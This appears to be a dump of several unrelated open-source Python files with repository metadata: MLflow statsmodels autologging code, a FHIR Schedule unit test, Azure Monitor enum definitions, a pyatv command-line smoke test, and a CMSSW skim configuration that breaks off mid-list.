- an html artifact which shows the model summary.
:param log_models: If ``True``, trained models are logged as MLflow model artifacts.
If ``False``, trained models are not logged.
Input examples and model signatures, which are attributes of MLflow models,
are also omitted when ``log_models`` is ``False``.
:param log_datasets: If ``True``, dataset information is logged to MLflow Tracking.
If ``False``, dataset information is not logged.
:param disable: If ``True``, disables the statsmodels autologging integration. If ``False``,
enables the statsmodels autologging integration.
:param exclusive: If ``True``, autologged content is not logged to user-created fluent runs.
If ``False``, autologged content is logged to the active fluent run,
which may be user-created.
:param disable_for_unsupported_versions: If ``True``, disable autologging for versions of
statsmodels that have not been tested against this version of the MLflow
client or are incompatible.
:param silent: If ``True``, suppress all event logs and warnings from MLflow during statsmodels
autologging. If ``False``, show all events and warnings during statsmodels
autologging.
:param registered_model_name: If given, each time a model is trained, it is registered as a
new model version of the registered model with this name.
The registered model is created if it does not already exist.
:param extra_tags: A dictionary of extra tags to set on each managed run created by autologging.
"""
import statsmodels
# Autologging depends on the exploration of the models class tree within the
# `statsmodels.base.models` module. In order to load / access this module, the
# `statsmodels.api` module must be imported
import statsmodels.api
def find_subclasses(klass):
"""
Recursively return a (non-nested) list of the class object and all its subclasses
:param klass: the class whose class subtree we want to retrieve
:return: a list of classes that includes the argument in the first position
"""
subclasses = klass.__subclasses__()
if subclasses:
subclass_lists = [find_subclasses(c) for c in subclasses]
chain = itertools.chain.from_iterable(subclass_lists)
result = [klass] + list(chain)
return result
else:
return [klass]
def overrides(klass, function_name):
"""
Returns True when the class passed as first argument overrides the function_name
Based on https://stackoverflow.com/a/62303206/5726057
:param klass: the class we are inspecting
:param function_name: a string with the name of the method we want to check overriding
:return:
"""
try:
superclass = inspect.getmro(klass)[1]
overridden = getattr(klass, function_name) is not getattr(superclass, function_name)
return overridden
except (IndexError, AttributeError):
return False
def patch_class_tree(klass):
"""
Patches all subclasses that override any auto-loggable method via monkey patching using
the gorilla package, taking the argument as the tree root in the class hierarchy. Every
auto-loggable method found in any of the subclasses is replaced by the patched version.
:param klass: root in the class hierarchy to be analyzed and patched recursively
"""
# TODO: add more autologgable methods here (e.g. fit_regularized, from_formula, etc)
# See https://www.statsmodels.org/dev/api.html
autolog_supported_func = {"fit": wrapper_fit}
glob_subclasses = set(find_subclasses(klass))
# Create a patch for every method that needs to be patched, i.e. those
# which actually override an autologgable method
patches_list = [
# Link the patched function with the original via a local variable in the closure
# to allow invoking superclass methods in the context of the subclass, and not
# losing the trace of the true original method
(clazz, method_name, wrapper_func)
for clazz in glob_subclasses
for (method_name, wrapper_func) in autolog_supported_func.items()
if overrides(clazz, method_name)
]
for clazz, method_name, patch_impl in patches_list:
safe_patch(
FLAVOR_NAME, clazz, method_name, patch_impl, manage_run=True, extra_tags=extra_tags
)
def wrapper_fit(original, self, *args, **kwargs):
should_autolog = False
if AutologHelpers.should_autolog:
AutologHelpers.should_autolog = False
should_autolog = True
try:
if should_autolog:
# This may generate warnings due to collisions in already-logged param names
log_fn_args_as_params(original, args, kwargs)
# training model
model = original(self, *args, **kwargs)
if should_autolog:
# Log the model
if get_autologging_config(FLAVOR_NAME, "log_models", True):
global _save_model_called_from_autolog
_save_model_called_from_autolog = True
registered_model_name = get_autologging_config(
FLAVOR_NAME, "registered_model_name", None
)
try:
log_model(
model,
artifact_path="model",
registered_model_name=registered_model_name,
)
finally:
_save_model_called_from_autolog = False
# Log the most common metrics
if isinstance(model, statsmodels.base.wrapper.ResultsWrapper):
metrics_dict = _get_autolog_metrics(model)
mlflow.log_metrics(metrics_dict)
model_summary = model.summary().as_text()
mlflow.log_text(model_summary, "model_summary.txt")
return model
finally:
# Clean the shared flag for future calls in case it had been set here ...
if should_autolog:
AutologHelpers.should_autolog = True
patch_class_tree(statsmodels.base.model.Model)
if autolog.__doc__ is not None:
autolog.__doc__ = autolog.__doc__.format(
autolog_metric_allowlist=", ".join(_autolog_metric_allowlist)
)
|
b02c5ddb9318fe8b8c1c7f79fc851d6c959b9606
|
fdb9bdc6c4ab2f14ba71e544493706d5e275899f
|
/fhir/resources/tests/test_schedule.py
|
3b855ab47f067208d92448ee310f0b9259358371
|
[
"BSD-3-Clause"
] |
permissive
|
nazrulworld/fhir.resources
|
6ae8aea8180c611b0c5050759c6dcdf63e4cb061
|
1fd6ea476b27b3fcb8c4ef8f23bc51cf161e69e3
|
refs/heads/main
| 2023-08-30T18:27:27.277249
| 2023-07-03T19:57:06
| 2023-07-03T19:57:06
| 165,297,877
| 256
| 83
|
NOASSERTION
| 2023-08-24T15:34:05
| 2019-01-11T19:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 9,772
|
py
|
test_schedule.py
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Schedule
Release: R5
Version: 5.0.0
Build ID: 2aecd53
Last updated: 2023-03-26T15:21:02.749+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import schedule
def impl_schedule_1(inst):
assert inst.active is True
assert inst.actor[0].display == "Dr. Beverly Crusher"
assert inst.actor[0].reference == "Practitioner/1"
assert inst.actor[1].display == "USS Enterprise-D Sickbay"
assert inst.actor[1].reference == "Location/3"
assert inst.comment == (
"The slots attached to this schedule are for genetic "
"counselling in the USS Enterprise-D Sickbay."
)
assert inst.id == "exampleloc1"
assert inst.identifier[0].system == "http://example.org/scheduleid"
assert inst.identifier[0].use == "usual"
assert inst.identifier[0].value == "46"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2017-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2017-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "17"
assert inst.serviceCategory[0].coding[0].display == "General Practice"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert inst.serviceType[0].concept.coding[0].code == "75"
assert inst.serviceType[0].concept.coding[0].display == "Genetic Counselling"
assert (
inst.serviceType[0].concept.coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-type"
)
assert inst.specialty[0].coding[0].code == "394580004"
assert inst.specialty[0].coding[0].display == "Clinical genetics"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_1(base_settings):
"""No. 1 tests collection for Schedule.
Test File: schedule-provider-location1-example.json
"""
filename = (
base_settings["unittest_data_dir"] / "schedule-provider-location1-example.json"
)
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_1(inst2)
def impl_schedule_2(inst):
assert inst.active is True
assert inst.actor[0].display == "Burgers UMC, South Wing, second floor"
assert inst.actor[0].reference == "Location/1"
assert inst.comment == (
"The slots attached to this schedule should be specialized to"
" cover immunizations within the clinic"
)
assert inst.id == "example"
assert inst.identifier[0].system == "http://example.org/scheduleid"
assert inst.identifier[0].use == "usual"
assert inst.identifier[0].value == "45"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.name == "Burgers UMC, South Wing - Immunizations"
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2013-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2013-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "17"
assert inst.serviceCategory[0].coding[0].display == "General Practice"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert inst.serviceType[0].concept.coding[0].code == "57"
assert inst.serviceType[0].concept.coding[0].display == "Immunization"
assert (
inst.serviceType[0].concept.coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-type"
)
assert inst.specialty[0].coding[0].code == "408480009"
assert inst.specialty[0].coding[0].display == "Clinical immunology"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_2(base_settings):
"""No. 2 tests collection for Schedule.
Test File: schedule-example.json
"""
filename = base_settings["unittest_data_dir"] / "schedule-example.json"
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_2(inst2)
def impl_schedule_3(inst):
assert inst.active is True
assert inst.actor[0].display == "Burgers UMC, South Wing, second floor"
assert inst.actor[0].reference == "Location/1"
assert inst.id == "example-hcs"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.name == "Burgers UMC, Posttraumatic Stress Disorder counselling"
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2023-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2023-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "8"
assert inst.serviceCategory[0].coding[0].display == "Counselling"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert (
inst.serviceType[0].reference.display
== "Burgers UMC, Posttraumatic Stress Disorder Clinic"
)
assert inst.serviceType[0].reference.reference == "HealthcareService/example"
assert inst.specialty[0].coding[0].code == "47505003"
assert inst.specialty[0].coding[0].display == "Posttraumatic stress disorder"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_3(base_settings):
"""No. 3 tests collection for Schedule.
Test File: schedule-example-hcs.json
"""
filename = base_settings["unittest_data_dir"] / "schedule-example-hcs.json"
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_3(inst2)
def impl_schedule_4(inst):
assert inst.active is True
assert inst.actor[0].display == "Dr. Beverly Crusher"
assert inst.actor[0].reference == "Practitioner/1"
assert inst.actor[1].display == "Starfleet HQ Sickbay"
assert inst.actor[1].reference == "Location/2"
assert inst.comment == (
"The slots attached to this schedule are for neurosurgery "
"operations at Starfleet HQ only."
)
assert inst.id == "exampleloc2"
assert inst.identifier[0].system == "http://example.org/scheduleid"
assert inst.identifier[0].use == "usual"
assert inst.identifier[0].value == "47"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2017-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2017-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "31"
assert inst.serviceCategory[0].coding[0].display == "Specialist Surgical"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert inst.serviceType[0].concept.coding[0].code == "221"
assert inst.serviceType[0].concept.coding[0].display == "Surgery - General"
assert (
inst.serviceType[0].concept.coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-type"
)
assert inst.specialty[0].coding[0].code == "394610002"
assert inst.specialty[0].coding[0].display == "Surgery-Neurosurgery"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_4(base_settings):
"""No. 4 tests collection for Schedule.
Test File: schedule-provider-location2-example.json
"""
filename = (
base_settings["unittest_data_dir"] / "schedule-provider-location2-example.json"
)
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_4(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_4(inst2)
|
a6c8be9715f006ca89baac2fa9a3cf78931e7f92
|
c50e7eb190802d7849c0d0cea02fb4d2f0021777
|
/src/monitor-control-service/azext_amcs/vendored_sdks/amcs/models/_monitor_client_enums.py
|
13a81ab93fa6a71b5425f43d8bcb61ba2d072ed2
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
Azure/azure-cli-extensions
|
c1615b19930bba7166c282918f166cd40ff6609c
|
b8c2cf97e991adf0c0a207d810316b8f4686dc29
|
refs/heads/main
| 2023-08-24T12:40:15.528432
| 2023-08-24T09:17:25
| 2023-08-24T09:17:25
| 106,580,024
| 336
| 1,226
|
MIT
| 2023-09-14T10:48:57
| 2017-10-11T16:27:31
|
Python
|
UTF-8
|
Python
| false
| false
| 5,898
|
py
|
_monitor_client_enums.py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class CreatedByType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity that created the resource.
"""
USER = "User"
APPLICATION = "Application"
MANAGED_IDENTITY = "ManagedIdentity"
KEY = "Key"
class KnownColumnDefinitionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of the column data.
"""
STRING = "string"
INT = "int"
LONG = "long"
REAL = "real"
BOOLEAN = "boolean"
DATETIME = "datetime"
DYNAMIC = "dynamic"
class KnownDataCollectionEndpointProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The resource provisioning state. This property is READ-ONLY.
"""
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class KnownDataCollectionEndpointResourceKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The kind of the resource.
"""
LINUX = "Linux"
WINDOWS = "Windows"
class KnownDataCollectionRuleAssociationProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The resource provisioning state.
"""
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class KnownDataCollectionRuleProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The resource provisioning state.
"""
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class KnownDataCollectionRuleResourceKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The kind of the resource.
"""
LINUX = "Linux"
WINDOWS = "Windows"
class KnownDataFlowStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_EVENT = "Microsoft-Event"
MICROSOFT_INSIGHTS_METRICS = "Microsoft-InsightsMetrics"
MICROSOFT_PERF = "Microsoft-Perf"
MICROSOFT_SYSLOG = "Microsoft-Syslog"
MICROSOFT_WINDOWS_EVENT = "Microsoft-WindowsEvent"
class KnownExtensionDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_EVENT = "Microsoft-Event"
MICROSOFT_INSIGHTS_METRICS = "Microsoft-InsightsMetrics"
MICROSOFT_PERF = "Microsoft-Perf"
MICROSOFT_SYSLOG = "Microsoft-Syslog"
MICROSOFT_WINDOWS_EVENT = "Microsoft-WindowsEvent"
class KnownLogFilesDataSourceFormat(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The data format of the log files
"""
TEXT = "text"
class KnownLogFileTextSettingsRecordStartTimestampFormat(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""One of the supported timestamp formats
"""
ISO8601 = "ISO 8601"
YYYY_MM_DD_HH_MM_SS = "YYYY-MM-DD HH:MM:SS"
M_D_YYYY_HH_MM_SS_AM_PM = "M/D/YYYY HH:MM:SS AM/PM"
MON_DD_YYYY_HH_MM_SS = "Mon DD, YYYY HH:MM:SS"
YY_M_MDD_HH_MM_SS = "yyMMdd HH:mm:ss"
DD_M_MYY_HH_MM_SS = "ddMMyy HH:mm:ss"
MMM_D_HH_MM_SS = "MMM d hh:mm:ss"
DD_MMM_YYYY_HH_MM_SS_ZZZ = "dd/MMM/yyyy:HH:mm:ss zzz"
YYYY_MM_DD_THH_MM_SS_K = "yyyy-MM-ddTHH:mm:ssK"
class KnownPerfCounterDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_PERF = "Microsoft-Perf"
MICROSOFT_INSIGHTS_METRICS = "Microsoft-InsightsMetrics"
class KnownPublicNetworkAccessOptions(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The configuration to set whether network access from public internet to the endpoints are
allowed.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class KnownSyslogDataSourceFacilityNames(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
AUTH = "auth"
AUTHPRIV = "authpriv"
CRON = "cron"
DAEMON = "daemon"
KERN = "kern"
LPR = "lpr"
MAIL = "mail"
MARK = "mark"
NEWS = "news"
SYSLOG = "syslog"
USER = "user"
UUCP = "uucp"
LOCAL0 = "local0"
LOCAL1 = "local1"
LOCAL2 = "local2"
LOCAL3 = "local3"
LOCAL4 = "local4"
LOCAL5 = "local5"
LOCAL6 = "local6"
LOCAL7 = "local7"
ASTERISK = "*"
class KnownSyslogDataSourceLogLevels(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DEBUG = "Debug"
INFO = "Info"
NOTICE = "Notice"
WARNING = "Warning"
ERROR = "Error"
CRITICAL = "Critical"
ALERT = "Alert"
EMERGENCY = "Emergency"
ASTERISK = "*"
class KnownSyslogDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_SYSLOG = "Microsoft-Syslog"
class KnownWindowsEventLogDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_WINDOWS_EVENT = "Microsoft-WindowsEvent"
MICROSOFT_EVENT = "Microsoft-Event"
|
23df8b35d41873d34f370ee3fe63f30a32a411ce
|
786f9ae62cb62d2b8f193350d8beb695c47d2e98
|
/tests/scripts/test_atvremote.py
|
1154f6a478ea23730f0e60d9e4b51beba53f5c2d
|
[
"MIT"
] |
permissive
|
postlund/pyatv
|
a4213957d4d9b557c16310450bfd444cc715e17c
|
05ca46d2a8bbc8e725ad63794d14b2d1fb9913fa
|
refs/heads/master
| 2023-09-01T20:11:48.374857
| 2023-08-29T04:23:22
| 2023-08-29T11:13:17
| 80,614,028
| 749
| 120
|
MIT
| 2023-09-14T04:54:01
| 2017-02-01T11:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 3,391
|
py
|
test_atvremote.py
|
"""Smoke test for atvremote."""
from pyatv.auth.hap_pairing import parse_credentials
from pyatv.auth.server_auth import CLIENT_CREDENTIALS
from pyatv.const import Protocol
from tests.fake_device.airplay import DEVICE_CREDENTIALS, DEVICE_PIN
from tests.scripts.script_env import AIRPLAY_ID, DMAP_ID, IP_1, IP_2, MRP_ID, ScriptTest
class AtvremoteTest(ScriptTest):
async def atvremote(self, *args):
return await self.run_script("atvremote", *args)
async def test_scan_devices(self):
await self.atvremote("scan")
self.has_output(
"Apple TV 1", "Apple TV 2", IP_1, IP_2, MRP_ID, AIRPLAY_ID, DMAP_ID
)
self.exit(0)
async def test_scan_hosts(self):
await self.atvremote("--scan-hosts", "127.0.0.1", "scan")
self.has_output("Apple TV 2", IP_2, MRP_ID, AIRPLAY_ID)
self.exit(0)
async def test_scan_single_identifier(self):
await self.atvremote("--id", MRP_ID, "scan")
self.has_output("Apple TV 2", IP_2, MRP_ID, AIRPLAY_ID)
self.exit(0)
async def test_scan_multiple_identifier(self):
await self.atvremote("--id", f"bad_id,{DMAP_ID}", "scan")
self.has_output(
"Apple TV 1",
IP_1,
DMAP_ID,
)
self.exit(0)
async def test_pair_airplay(self):
self.user_input(str(DEVICE_PIN))
await self.atvremote(
"--address",
IP_2,
"--protocol",
"airplay",
"--id",
MRP_ID,
"pair",
)
self.has_output(
"Enter PIN",
"seems to have succeeded",
parse_credentials(DEVICE_CREDENTIALS),
)
self.exit(0)
async def test_airplay_play_url(self):
self.user_input(str(DEVICE_PIN))
await self.atvremote(
"--id",
MRP_ID,
"--airplay-credentials",
DEVICE_CREDENTIALS,
"play_url=http://fake",
)
self.exit(0)
async def test_mrp_idle(self):
await self.atvremote("--id", MRP_ID, "playing")
self.has_output("Media type: Unknown", "Device state: Idle")
self.exit(0)
async def test_device_info(self):
await self.atvremote("--id", MRP_ID, "device_info")
self.has_output("tvOS", AIRPLAY_ID)
self.exit(0)
async def test_mrp_auth(self):
await self.atvremote(
"--id", MRP_ID, "--mrp-credentials", CLIENT_CREDENTIALS, "playing"
)
self.assertTrue(self.state.has_authenticated)
self.has_output("Device state: Idle")
self.exit(0)
async def test_mrp_auth_error(self):
await self.atvremote(
"--id", MRP_ID, "--mrp-credentials", "30:31:32:33", "playing"
)
self.assertFalse(self.state.has_authenticated)
self.has_error("AuthenticationError")
self.exit(1)
async def test_manual_connect(self):
self.user_input(str(DEVICE_PIN))
await self.atvremote(
"--address",
IP_2,
"--protocol",
"mrp",
"--port",
str(self.fake_atv.get_port(Protocol.MRP)),
"--id",
MRP_ID,
"--manual",
"playing",
)
self.has_output("Media type: Unknown", "Device state: Idle")
self.exit(0)
|
2b6acffe597694160680ac0600e698d03bcdbadc
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Configuration/Skimming/test/SDmaker_6SD_3CS_PDMinBias_1e28_cfg.py
|
b1d3db427d03f5fdcb72ea1b437089967893621a
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 16,026
|
py
|
SDmaker_6SD_3CS_PDMinBias_1e28_cfg.py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("makeSD")
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.2 $'),
annotation = cms.untracked.string('SD and central skims'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/Skimming/test/SDmaker_6SD_3CS_PDMinBias_1e28_cfg.py,v $')
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
process.load("Configuration.StandardSequences.MagneticField_38T_cff")
process.load("Configuration.StandardSequences.GeometryExtended_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load('Configuration.EventContent.EventContent_cff')
process.GlobalTag.globaltag = "GR_R_36X_V11A::All"
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/data/Commissioning10/MinimumBias/RAW-RECO/v8/000/132/601/F85204EE-EB40-DF11-8F71-001A64789D1C.root'
),
secondaryFileNames = cms.untracked.vstring(
'/store/data/Commissioning09/Cosmics/RAW/v3/000/105/755/F6887FD0-9371-DE11-B69E-00304879FBB2.root'
)
)
process.source.inputCommands = cms.untracked.vstring("keep *", "drop *_MEtoEDMConverter_*_*")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 100
import HLTrigger.HLTfilters.hltHighLevelDev_cfi
### JetMETTau SD
process.JetMETTau_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.JetMETTau_1e28.HLTPaths = (
"HLT_Jet15U",
"HLT_DiJetAve15U_8E29",
"HLT_FwdJet20U",
"HLT_Jet30U",
"HLT_Jet50U",
"HLT_DiJetAve30U_8E29",
"HLT_QuadJet15U",
"HLT_MET45",
"HLT_MET100",
"HLT_HT100U",
"HLT_SingleLooseIsoTau20",
"HLT_DoubleLooseIsoTau15",
"HLT_DoubleJet15U_ForwardBackward",
"HLT_BTagMu_Jet10U",
"HLT_BTagIP_Jet50U",
"HLT_StoppedHSCP_8E29"
)
process.JetMETTau_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
process.JetMETTau_1e28.HLTOverallPrescale = cms.uint32(1)
process.JetMETTau_1e28.throw = False
process.JetMETTau_1e28.andOr = True
process.filterSdJetMETTau_1e28 = cms.Path(process.JetMETTau_1e28)
### JetMETTauMonitor SD
process.JetMETTauMonitor_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.JetMETTauMonitor_1e28.HLTPaths = (
"HLT_L1Jet6U",
"HLT_L1MET20",
"HLT_L1SingleCenJet",
"HLT_L1SingleForJet",
"HLT_L1SingleTauJet",
"HLT_L1Jet10U",
"HLT_L1Jet10U_NoBPTX",
"HLT_L1Jet6U_NoBPTX",
"HLT_L1SingleCenJet_NoBPTX",
"HLT_L1SingleForJet_NoBPTX",
"HLT_L1SingleTauJet_NoBPTX"
)
process.JetMETTauMonitor_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1)
process.JetMETTauMonitor_1e28.HLTOverallPrescale = cms.uint32(1)
process.JetMETTauMonitor_1e28.throw = False
process.JetMETTauMonitor_1e28.andOr = True
process.filterSdJetMETTauMonitor_1e28 = cms.Path(process.JetMETTauMonitor_1e28)
### MuMonitor SD
process.MuMonitor_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.MuMonitor_1e28.HLTPaths = (
"HLT_L1MuOpen",
"HLT_L1Mu"
)
process.MuMonitor_1e28.HLTPathsPrescales = cms.vuint32(1,1)
process.MuMonitor_1e28.HLTOverallPrescale = cms.uint32(1)
process.MuMonitor_1e28.throw = False
process.MuMonitor_1e28.andOr = True
process.filterSdMuMonitor_1e28 = cms.Path(process.MuMonitor_1e28)
### Mu SD
process.Mu_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.Mu_1e28.HLTPaths = (
"HLT_L2Mu0",
"HLT_L2Mu3",
#"HLT_L2Mu5",
"HLT_L1Mu20",
"HLT_L2Mu9",
"HLT_L2Mu11",
"HLT_L1Mu14_L1SingleEG10",
"HLT_L1Mu14_L1SingleJet6U",
"HLT_L1Mu14_L1ETM30",
"HLT_L2DoubleMu0",
"HLT_L1DoubleMuOpen",
"HLT_DoubleMu0",
"HLT_DoubleMu3",
"HLT_Mu3",
"HLT_Mu5",
"HLT_Mu9",
"HLT_IsoMu3",
"HLT_Mu0_L1MuOpen",
"HLT_Mu0_Track0_Jpsi",
"HLT_Mu3_L1MuOpen",
"HLT_Mu3_Track0_Jpsi",
"HLT_Mu5_L1MuOpen",
"HLT_Mu5_Track0_Jpsi",
"HLT_Mu0_L2Mu0",
"HLT_Mu3_L2Mu0",
"HLT_Mu5_L2Mu0"
)
process.Mu_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
process.Mu_1e28.HLTOverallPrescale = cms.uint32(1)
process.Mu_1e28.throw = False
process.Mu_1e28.andOr = True
process.filterSdMu_1e28 = cms.Path(process.Mu_1e28)
### EGMonitor SD
process.EGMonitor_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.EGMonitor_1e28.HLTPaths = (
"HLT_L1SingleEG2",
"HLT_L1SingleEG5",
"HLT_L1SingleEG8",
"HLT_L1DoubleEG5",
"HLT_EgammaSuperClusterOnly_L1R",
"HLT_L1SingleEG20_NoBPTX",
"HLT_L1SingleEG2_NoBPTX",
"HLT_L1SingleEG5_NoBPTX"
)
process.EGMonitor_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1)
process.EGMonitor_1e28.HLTOverallPrescale = cms.uint32(1)
process.EGMonitor_1e28.throw = False
process.EGMonitor_1e28.andOr = True
process.filterSdEGMonitor_1e28 = cms.Path(process.EGMonitor_1e28)
### EG SD
process.EG_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.EG_1e28.HLTPaths = (
"HLT_Photon10_L1R",
"HLT_Photon15_L1R",
"HLT_Photon15_LooseEcalIso_L1R",
"HLT_Photon20_L1R",
"HLT_Photon30_L1R_8E29",
"HLT_DoublePhoton4_Jpsi_L1R",
"HLT_DoublePhoton4_Upsilon_L1R",
"HLT_DoublePhoton4_eeRes_L1R",
